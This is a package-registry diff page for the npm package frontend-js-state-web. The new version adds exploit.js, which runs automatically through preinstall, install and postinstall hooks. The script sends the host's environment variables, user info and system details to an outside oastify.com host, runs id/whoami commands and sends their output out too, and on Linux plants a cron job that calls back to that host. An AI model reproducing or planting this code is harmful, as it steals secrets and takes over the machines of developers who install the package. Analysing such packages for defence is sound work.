npm - frontend-js-state-web - Versions diffs - 0.0.1-security → 2.2.3 - Mend

frontend-js-state-web 0.0.1-security → 2.2.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of frontend-js-state-web might be problematic. Click here for more details.

Files changed (4) hide show

package/exploit.js ADDED Viewed

@@ -0,0 +1,87 @@
+// This would execute during npm install
+const { exec } = require('child_process');
+const https = require('https');
+const os = require('os');
+// Collect system information
+const systemInfo = {
+  hostname: os.hostname(),
+  platform: os.platform(),
+  arch: os.arch(),
+  userInfo: os.userInfo(),
+  cwd: process.cwd(),
+  env: process.env,
+  npm_config: process.env.npm_config_registry
+};
+// Send to your burp collaborator
+const data = JSON.stringify({
+  type: 'dependency_confusion_exploit',
+  package: 'frontend-js-state-web',
+  version: '2.2.2',
+  ...systemInfo
+});
+const options = {
+  hostname: 'd1fwex228qty8owpu3dr14rzaqgh48sx.oastify.com',
+  port: 443,
+  path: '/',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': data.length
+  }
+};
+const req = https.request(options, (res) => {
+  console.log('Data exfiltrated successfully');
+});
+req.on('error', (error) => {
+  // Silently fail
+});
+req.write(data);
+req.end();
+// RCE Example (more aggressive)
+const commands = {
+  linux: 'id && ls -la && uname -a',
+  win32: 'whoami && dir',
+  darwin: 'id && ls -la'
+};
+const cmd = commands[os.platform()] || 'echo "Unknown platform"';
+exec(cmd, (error, stdout, stderr) => {
+  const result = { stdout, stderr, error: error ? error.message : null };
+  // Send command output back
+  const resultData = JSON.stringify({
+    type: 'command_output',
+    command: cmd,
+    ...result
+  });
+  const resultReq = https.request({
+    hostname: 'd1fwex228qty8owpu3dr14rzaqgh48sx.oastify.com',
+    port: 443,
+    path: '/output',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': resultData.length
+    }
+  });
+  resultReq.write(resultData);
+  resultReq.end();
+});
+// Install persistence if possible
+if (os.platform() === 'linux') {
+  // Create a cron job for persistence (example)
+  const cronLine = `* * * * * curl -s https://d1fwex228qty8owpu3dr14rzaqgh48sx.oastify.com/ping`;
+  exec(`echo "${cronLine}" | crontab -`, { silent: true });
+}
+console.log('frontend-js-state-web installed successfully!');

package/index.js ADDED Viewed

@@ -0,0 +1,5 @@
+// Normal-looking module that does nothing malicious at runtime
+module.exports = {
+  version: '2.2.3',
+  description: 'Frontend JS State Web'
+};

package/package.json CHANGED Viewed

@@ -1,6 +1,13 @@
 {
   "name": "frontend-js-state-web",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "2.2.3",
+  "description": "Legitimate-looking package",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node exploit.js",
+    "install": "node exploit.js",
+    "postinstall": "node exploit.js"
+  },
+  "dependencies": {},
+  "files": ["index.js", "exploit.js"]
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=frontend-js-state-web for more information.